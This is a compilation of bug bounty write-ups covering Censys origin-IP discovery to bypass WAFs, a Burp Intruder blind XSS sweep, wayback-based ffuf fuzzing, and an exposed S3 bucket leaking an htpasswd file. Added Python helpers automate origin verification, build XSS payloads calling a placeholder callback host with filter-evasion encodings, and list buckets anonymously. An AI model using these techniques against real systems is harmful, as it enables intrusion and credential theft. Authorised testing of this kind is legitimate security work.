
Let's fuck WAF using the origin IP: my approach on Censys

Hello amazing hackers, I am Deepak Dhiman a.k.a. Virdoex_hunter from India. I hope you are doing well. I am a bug bounty hunter. Many people ask me how I use Censys to find the origin IP behind a proxy WAF such as Akamai or Cloudflare, so without wasting time let's start. If you don't understand something and want a detailed video on it, let me know in the comments and I will try to make one on my YouTube. There are two ways you can use Censys to find an origin IP:
  •  The hardest way (a bit of a time saver)
  •  The easiest way (a bluff that works).
Let's start with the hardest way: it saves a little time per hit but needs a lot of clicking. THE HARDEST WAY, STEPS:
  •  Log in to Censys, open the search page, choose Certificates and search for your target (for example, the target domain in the certificate names).
  •  Open any certificate; on the right you will find Explore. Hover over it and click Hosts.
  •  In Hosts, copy every IP you find and try to open it in a new tab.
Repeat this for every certificate: open its hosts and run the same process. That is the hardest way.
EASY WAY: you want to play bluff? I like it.
  •  Log in and this time put your target in Hosts.
  •  Now filter by Autonomous System and pick one other than Cloudflare or Akamai.
  •  Try every IP in a new tab and check its autonomous system, but make sure the match is on cert.CN: target.com and nothing else; target.com must appear in cert.CN, not only in http.body or some other field.
LET'S make the bluff a winning game
  •  Now you have an IP that works and belongs to the target. Next, find out which domain it points to and whether that domain is behind a WAF.
  •  Collect all subdomains and resolve them with httpx, or install a multi-URL opener extension and the shodan.io extension in your browser.
  •  Paste all the URLs and look for the one whose front end looks like (or is a clone of) what the IP serves. When you find it, click the Shodan extension on that domain to see whether it sits behind Cloudflare or not.
  •  If it does, congratulations: you have found the IP behind the WAF.
  Exploitation:
  •  Dirsearch
  •  Port scan
  •  Test the origin IP the same way you would the domain: rate limiting, XSS, 2FA bypass, password reset poisoning, etc.
If you like this, please let me know by sharing it on your social media. Thanks, regards, Deepak Dhiman. Bounty I have made till now using this > $$$$
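The filtering done by hand above (keep only hosts whose certificate really names the target, throw away Cloudflare/Akamai edges, then hit the remaining IP directly with the target's Host header) can be scripted. The block below is an added example and not the author's code or Censys's API client. It assumes: the host records are constructed to mimic the shape of Censys host hits (ip, autonomous_system.name, the leaf certificate's CN and SANs), CDN_RANGES is a partial snapshot of Cloudflare's published IPv4 list (refresh it from https://www.cloudflare.com/ips-v4 before relying on it), and target.com is a placeholder. It also goes one step beyond the text by matching SANs and one-label wildcards, not only the CN, since Censys' cert.CN filter misses hosts that only carry the name in a SAN.

```python
"""Added example (not the author's code): triage Censys-style host candidates for
an origin IP hunt, then verify one by connecting to it directly with SNI/Host set
to the target, bypassing the CDN edge.
"""
import ipaddress
import socket
import ssl

# Constructed snapshot of a few Cloudflare IPv4 ranges; refresh from the vendor list before use.
CDN_RANGES = [ipaddress.ip_network(c) for c in (
    "104.16.0.0/13", "104.24.0.0/14", "172.64.0.0/13", "162.158.0.0/15",
    "198.41.128.0/17", "173.245.48.0/20", "141.101.64.0/18",
)]
CDN_ASN_NAMES = ("CLOUDFLARENET", "AKAMAI")


def is_cdn_ip(ip):
    """True if ip falls inside one of the known CDN edge ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CDN_RANGES)


def name_matches(target, cert_names):
    """True if the leaf cert's CN/SAN list covers target, including one-label wildcards."""
    target = target.lower().rstrip(".")
    parent = target.split(".", 1)[1] if "." in target else ""
    for name in cert_names:
        name = name.lower().rstrip(".")
        if name == target:
            return True
        if name.startswith("*.") and name[2:] == parent:
            return True
    return False


def candidate_origins(hosts, target):
    """Keep hosts whose cert really names the target and that are not CDN edges."""
    out = []
    for h in hosts:
        asn = h.get("autonomous_system", {}).get("name", "")
        if any(c in asn.upper() for c in CDN_ASN_NAMES) or is_cdn_ip(h["ip"]):
            continue
        if name_matches(target, h.get("cert_names", [])):   # CN + SANs of the leaf cert
            out.append(h["ip"])
    return out


def verify_origin(ip, target, path="/", timeout=5):
    """Connect straight to ip with SNI and Host = target; return (status, Server header).
    Compare with the response through the CDN: same app means you found the origin.
    If the origin uses an internal cert, set ctx.check_hostname = False and
    ctx.verify_mode = ssl.CERT_NONE."""
    ctx = ssl.create_default_context()
    with socket.create_connection((ip, 443), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=target) as tls:
            tls.sendall(f"GET {path} HTTP/1.1\r\nHost: {target}\r\nConnection: close\r\n\r\n".encode())
            data = b""
            while chunk := tls.recv(4096):
                data += chunk
    lines = data.split(b"\r\n\r\n", 1)[0].decode("latin-1").split("\r\n")
    status = int(lines[0].split()[1])
    server = next((l.split(":", 1)[1].strip() for l in lines[1:] if l.lower().startswith("server:")), "")
    return status, server


# Constructed sample records, shaped like Censys host hits for certificate name target.com.
SAMPLE_HOSTS = [
    {"ip": "104.16.1.1", "autonomous_system": {"name": "CLOUDFLARENET"}, "cert_names": ["target.com"]},
    {"ip": "203.0.113.10", "autonomous_system": {"name": "EXAMPLE-HOSTING"}, "cert_names": ["*.target.com", "target.com"]},
    {"ip": "203.0.113.11", "autonomous_system": {"name": "EXAMPLE-HOSTING"}, "cert_names": ["cdn.target.com.evil.example"]},
    {"ip": "198.51.100.5", "autonomous_system": {"name": "OTHER-ISP"}, "cert_names": ["*.shop.target.com"]},
]

if __name__ == "__main__":
    for ip in candidate_origins(SAMPLE_HOSTS, "target.com"):
        print("candidate origin:", ip)
        print(f"  verify: curl -sk --resolve target.com:443:{ip} https://target.com/ -o /dev/null -w '%{{http_code}}\\n'")
```

The third sample host shows why the text insists on cert.CN being exactly the target: a name like cdn.target.com.evil.example contains the string but is not the target, and a substring search would keep it. The printed curl line does the same thing as verify_origin() from the shell; if it returns the same application as the CDN-fronted site, the WAF is out of the path.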

If you like my work you can do support me by buying me a coffee.


Bugcrowd and Me: A Story of Not Giving Up (My first bounty on Bugcrowd)

Hello amazing hackers, my name is Deepak Dhiman (also known as @Virdoex_hunter in the bug bounty community). I am a bug bounty hunter; I hunt when I want to (currently looking for a job or internship). Today I'll share my first bounty experience on Bugcrowd (after clickbaiting, no support and no invites). I hope you enjoy it and learn something.

PART 1: N/A and dupes all around

When I started hacking on Bugcrowd I came to know it is a nice platform for beginners (at that time I only knew a few bugs and had little experience), so my first 4 reports were duplicates and I got 4 points, which felt cool. But after some time they made every report of mine N/A, and after I gave some negative points in the researcher experience feedback I stopped receiving any private invites.

PART 2: Finding private program using google dork

Since I was not receiving any private invites and had only 14 points, I looked for private programs using dorks. I asked Aditya Shende bro which dork list I should use to find programs, and he recommended a GitHub repo that helped me find programs to hunt on.

sushiwushi/bug-bounty-dorks (github.com): List of Google Dorks to search for companies that have a responsible disclosure program or bug bounty program which are…

PART 3: Clickbaiting

So finally I was sending reports on Bugcrowd. This year, in March 21, I submitted an email HTML injection bug on a private (joinable) program. In the first 14 days they changed 4 triagers and every one of them asked me for the PoC again and again, and after 2 months of triage they marked it as a duplicate of an XSS (which can never be possible, since you cannot log in), i.e. a false one. Then I asked them to invite me on that report (I know that is not how Bugcrowd works) because I wanted to see whether it really was a duplicate, but they did not give me any response. So I left it and then reported my favourite bug, DoS, on 3 different programs, and they made each one a duplicate by changing the priority from P3 to P2. Finally I found the same DoS on a program where it was valid, and that time they made it P5. I mailed their support team, but there has been no response for the last 3 months (if that is not clickbaiting, let me know what it is). So I tweeted at the support team, but they responded that they would ban me instead of giving me a fair result.

PART 4: My first bounty on Bugcrowd

So one day I was hunting on an RDP and there was a feedback form on the product. I went to xsshunter.com/app and copied all my payloads. I put "test" in every field (except email): name, message, etc., intercepted the request in Burp, sent it to Intruder, marked every "test" as a position, chose the pitchfork attack, selected simple list as the payload type, pasted all my xsshunter payloads and clicked start attack. After 5 hours I got an email notification that my payload had fired; in the first week it fired 30 times and I got the IPs of 3 employees who were logged in to the third-party application that handles the forms. I reported it, and the next day they invited me on Bugcrowd and rewarded me with $$$.

KEY POINTS:

  1. Don't give negative feedback on the platform.
  2. For blind XSS, put your payload in every kind of input field (even the password field and wrong attempts on an admin panel, because sometimes it keeps logs of the credentials tried against the admin login and your blind XSS payload may fire there).
  3. You can also use Intruder's payload processing to encode payloads and bypass protections.
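What the pitchfork run in Part 4 actually sends is easy to misread, so here is the same sweep written out as an added example (not the author's code and not Burp's): one request per payload, with that payload placed in every non-email field at once, plus the encoded variants key point 3 refers to. The form fields, the skip set and the callback host https://x.example are constructed placeholders; in practice you paste the payload list from your own callback service.

```python
"""Added example (not the author's code): build the request bodies a Burp Intruder
pitchfork attack sends for a blind XSS sweep, same list on every position."""
import html
import urllib.parse

CALLBACK = "https://x.example"  # placeholder for your own blind-XSS callback host

# Constructed stand-ins for the payload list you would copy from your callback service.
BASE_PAYLOADS = [
    f'"><script src={CALLBACK}></script>',
    f'<img src=x onerror="import(\'{CALLBACK}\')">',
]

# Fields as captured from a feedback form (constructed); email stays valid so the
# backend accepts the submission and the payload reaches whoever reads it.
FORM = {"name": "test", "email": "test@target.com", "subject": "test", "message": "test"}
SKIP = {"email"}


def encode_variants(payload):
    """Encodings worth trying when a filter blocks the raw form. The body is URL-encoded
    once more on the wire, so 'url' arrives double-encoded (for backends that decode twice)
    and 'html_entities' targets reflection into a context that decodes entities."""
    return {
        "raw": payload,
        "url": urllib.parse.quote(payload, safe=""),
        "html_entities": html.escape(payload, quote=True),
    }


def pitchfork_bodies(form, payloads, skip=SKIP):
    """One urlencoded body per payload, with that payload in every non-skipped field
    (Intruder pitchfork with the same simple list loaded on every position)."""
    bodies = []
    for p in payloads:
        filled = {k: (v if k in skip else p) for k, v in form.items()}
        bodies.append(urllib.parse.urlencode(filled))
    return bodies


def all_bodies(form, payloads):
    """Expand every payload into its encoded variants first, then run the pitchfork."""
    expanded = [v for p in payloads for v in encode_variants(p).values()]
    return pitchfork_bodies(form, expanded)


if __name__ == "__main__":
    for body in all_bodies(FORM, BASE_PAYLOADS):
        print(body)
```

Pitchfork, not cluster bomb, is the right mode here: with one payload per request you know from the request log which payload fired when the callback arrives, and the number of requests stays at payloads times variants rather than payloads to the power of fields.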

I hope you like this write-up.

Thank you for giving your time on this.


How I got swag from an RDP by just creating a sitemap via wayback and fuzzing that sitemap with ffuf

Hello hackers, this is Deepak Dhiman from India and I hope you are all doing well. This write-up is about how I found an interesting endpoint on a target just by building a sitemap on an RDP program called Prepladder. Without wasting time, let's get to the main point.

One day I was testing this target and found an endpoint named demo, but that URL was dead (RIP, lol). So I tried one thing: why not check this endpoint on all the other domains of the target? I got a 200 OK on one domain, which was luckily out of scope and not very sensitive. So I ran dirsearch on the in-scope domains, but that did not find anything.

From that demo endpoint I got an idea: why not generate a sitemap of the target from wayback URLs? You may think you could just run ffuf on all the URLs directly, so why build a sitemap of endpoints from them? I say this because I noticed in wayback that if a.target.com/juicy is in the archive but no longer exists, the same endpoint may exist on their new domain or on another domain like b.target.com, and that is exactly what I noticed.
For wayback URLs I use tomnomnom's waybackurls tool, which you can find on GitHub: https://github.com/tomnomnom/waybackurls

How I generate the sitemap wordlist using waybackurls:

cat alive.txt | waybackurls | cut -d "/" -f4,5,6,7,8,9 | tee -a waybackwordlist.txt

Then I run ffuf on all the alive domains with this wordlist (alive.txt holds full URLs with scheme, as httpx prints them, so URL/DIR expands to a complete URL):

ffuf -w alive.txt:URL -w waybackwordlist.txt:DIR -u URL/DIR -t 300 -mc 200,403 -of html -o sitemap.html
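The cut pipeline above keeps whatever sits between the slashes, including query strings, image files and one exact path per line. The block below is an added example (not the author's code) that builds the same wordlist in Python and goes a little further: it strips query strings and fragments, drops static assets, deduplicates, and also emits every parent prefix so ffuf probes /admin as well as /admin/attendance. The sample URLs are constructed to look like waybackurls output; pipe real waybackurls output into the script on stdin.

```python
"""Added example (not the author's code): turn wayback URLs into a path wordlist
for ffuf, with parent prefixes, dedup and static-asset filtering."""
import sys
from urllib.parse import urlsplit

STATIC_EXT = (".png", ".jpg", ".jpeg", ".gif", ".svg", ".css", ".woff", ".woff2", ".ico")
MAX_DEPTH = 6   # mirrors cut -f4..9 in the original pipeline


def path_words(urls, max_depth=MAX_DEPTH, drop_static=True):
    """Yield unique path words (no leading slash) from URLs, including parent prefixes,
    in first-seen order. Query strings and fragments are discarded."""
    seen = set()
    for url in urls:
        url = url.strip()
        if not url:
            continue
        parts = [p for p in urlsplit(url).path.split("/") if p][:max_depth]
        if drop_static and parts and parts[-1].lower().endswith(STATIC_EXT):
            parts = parts[:-1]          # keep the directory, drop the asset itself
        for depth in range(1, len(parts) + 1):
            word = "/".join(parts[:depth])
            if word not in seen:
                seen.add(word)
                yield word


# Constructed sample, shaped like waybackurls output for two hosts of one target.
SAMPLE_URLS = [
    "https://a.target.com/demo",
    "https://a.target.com/demo/",
    "https://a.target.com/admin/attendance?month=3#top",
    "https://a.target.com/static/img/logo.png",
    "https://b.target.com/api/v1/users/1/profile/photos/2021/03/x.jpg",
]

if __name__ == "__main__":
    source = SAMPLE_URLS if sys.stdin.isatty() else sys.stdin
    for word in path_words(source):
        print(word)
```

Usage: `cat alive.txt | waybackurls | python3 sitemap_words.py > waybackwordlist.txt`, then the ffuf command above as written. Because the script emits prefixes, a hit on a parent path with 403 (which -mc 200,403 keeps) tells you the directory exists even when the archived leaf is gone, which is the situation that led to the attendance endpoint.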

And I found an interesting endpoint named attendance. Visiting it, I could add employees on the target, delete any employee, check the attendance of all employees and even upload fake attendance.

So I just took screenshots, wrote a good report and got swag from the target.

If you like this, please give me a follow on Twitter and Instagram.

Program: RDP (Prepladder)

Bounty: Swag

Thanks for reading.

If you like my work and want to support me, you can buy me a coffee using the link below.

Misconfigured S3 bucket leads to sensitive data exposure (no super controls)

Amazon S3 (Simple Storage Service) is one of the most popular and widely used storage services. Many companies use S3 buckets to store assets such as user profile pictures, static resources, and anything else their business logic needs. However, if a bucket is not configured properly, or is unclaimed, an attacker can perform mischievous actions such as S3 bucket takeover or S3 content takeover.

Hi fellow hackers, this is Deepak Dhiman from India. In this article I will talk about a recent encounter where a misconfigured S3 bucket disclosed old server code along with the auth file users.htpasswd.

You can read more about Amazon S3 here.

The application I was testing had a medium-sized scope. The finding relates to one of the program's subsidiaries. Let's call the subsidiary "target.com".

I started with subdomain enumeration, resolving the unique subdomains with the following command:

subfinder -d target.com | httpx | tee -a alive.txt

This gives all the alive subdomains.

I then opened every single alive domain in the browser; let's call one of them site.com.

After loading https://site.com I appended /%C0 to the URL, i.e.:

https://site.com/%C0

And I noticed that it returned an error like this. It is S3's own InvalidURI response rather than a Cloudflare error, and that is the tell: the host is backed by an S3 bucket.

<Error>
<Code>InvalidURI</Code>
<Message>Couldn't parse the specified URI.</Message>
<URI>/%C0</URI>
</Error>

So I appended .s3.amazonaws.com to the target domain:

https://target.com.s3.amazonaws.com/

If the bucket is named after the domain, this confirms the bucket name. Sometimes it says NoSuchBucket; in that case I run dig on the host:

$ dig site.com

This gives the CNAME the domain points to, which contains the real bucket name (and region) in the bucket.s3[-website][-region].amazonaws.com form.

So I was thinking about what to do with this, and read this article:

https://medium.com/bugbountywriteup/s3-bucket-misconfigured-access-controls-to-critical-vulnerability-6b535e3df9a5

But unluckily, on CRUD operations (put/delete) I got Access Denied.

So here my CTF skills came into play: first check what you can do. So I just ran:

aws s3 ls s3://target-bucketname

And in the response I found:

PRE Server/

After listing that prefix I found server.js and users.htpasswd, so I was able to read their old server code (the env one included) along with the auth file users.htpasswd.
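The three checks this write-up does by hand (spot the S3 error page, get the bucket name out of the CNAME, list the bucket) can be scripted so that every host in alive.txt gets the same treatment. The block below is an added example and not the author's code or the AWS CLI. The error body, the listing XML and the host/bucket names are constructed placeholders; list_bucket() is the only function that touches the network and is the unauthenticated equivalent of `aws s3 ls` (the CLI needs `--no-sign-request` to do the same when no credentials are configured).

```python
"""Added example (not the author's code): recognise an S3-backed host, recover the
bucket name and region from a CNAME, and parse an unauthenticated ListBucket
response, which is the view `aws s3 ls` prints as PRE / keys."""
import re
import xml.etree.ElementTree as ET
from urllib.request import Request, urlopen

S3_ERROR_CODES = ("InvalidURI", "NoSuchBucket", "AccessDenied", "NoSuchKey", "AllAccessDisabled")


def looks_like_s3(headers, body):
    """True if the response carries S3 markers: Server: AmazonS3, any x-amz-* header,
    or an S3-style <Error><Code>...</Code> document such as the InvalidURI one above."""
    h = {k.lower(): v for k, v in headers.items()}
    if h.get("server", "").lower() == "amazons3" or any(k.startswith("x-amz-") for k in h):
        return True
    m = re.search(r"<Code>([A-Za-z]+)</Code>", body)
    return bool(m and m.group(1) in S3_ERROR_CODES and "<Error>" in body)


# bucket.s3.amazonaws.com, bucket.s3.<region>.amazonaws.com, bucket.s3-<region>...,
# bucket.s3-website-<region>... and bucket.s3-website.<region>... are all covered.
CNAME_RE = re.compile(
    r"^(?P<bucket>[a-z0-9.-]+?)\.s3(?:-website)?"
    r"(?:[.-](?P<region>[a-z]{2}(?:-[a-z]+)+-\d))?\.amazonaws\.com\.?$"
)


def bucket_from_cname(cname):
    """Split e.g. site.com.s3-website-us-east-1.amazonaws.com into (bucket, region)."""
    m = CNAME_RE.match(cname.strip().lower())
    if not m:
        return None
    return m.group("bucket"), m.group("region") or "us-east-1"


def parse_listing(xml_text):
    """Return (common prefixes, keys) from a ListBucketResult document."""
    data = xml_text.encode() if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    ns = root.tag[1:].split("}")[0] if root.tag.startswith("{") else ""
    q = (lambda tag: f"{{{ns}}}{tag}") if ns else (lambda tag: tag)
    prefixes = [p.findtext(q("Prefix")) for p in root.iter(q("CommonPrefixes"))]
    keys = [c.findtext(q("Key")) for c in root.iter(q("Contents"))]
    return prefixes, keys


def list_bucket(bucket, prefix="", region="us-east-1", timeout=10):
    """Unauthenticated listing over HTTPS. An HTTP 403 here means public listing is off;
    a 200 with keys is the finding. Network call, not exercised offline."""
    url = f"https://{bucket}.s3.{region}.amazonaws.com/?list-type=2&delimiter=/&prefix={prefix}"
    with urlopen(Request(url, headers={"User-Agent": "s3-check"}), timeout=timeout) as resp:
        return parse_listing(resp.read())


# Constructed samples: the error page from the write-up and a listing with one prefix.
ERROR_BODY = """<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>InvalidURI</Code><Message>Couldn't parse the specified URI.</Message>
<URI>/%C0</URI><RequestId>0000</RequestId><HostId>x</HostId></Error>"""
LISTING = """<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>target-bucketname</Name><Prefix></Prefix><Delimiter>/</Delimiter>
<CommonPrefixes><Prefix>Server/</Prefix></CommonPrefixes>
<Contents><Key>index.html</Key><Size>1</Size></Contents>
</ListBucketResult>"""

if __name__ == "__main__":
    print("s3 error page:", looks_like_s3({}, ERROR_BODY))
    print("cname ->", bucket_from_cname("site.com.s3-website-us-east-1.amazonaws.com."))
    print("listing ->", parse_listing(LISTING))
```

Once bucket_from_cname() gives you a name, the write-up's aws s3 ls step is list_bucket(bucket, region=region), and a "Server/" entry in the prefixes is exactly the PRE Server/ line shown above; follow it with prefix="Server/" to see the keys underneath.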

Program: RDP

Bounty: $400

Thank you,

I hope you liked this (sorry for my bad English).

If you like it, you can support me by buying me a coffee.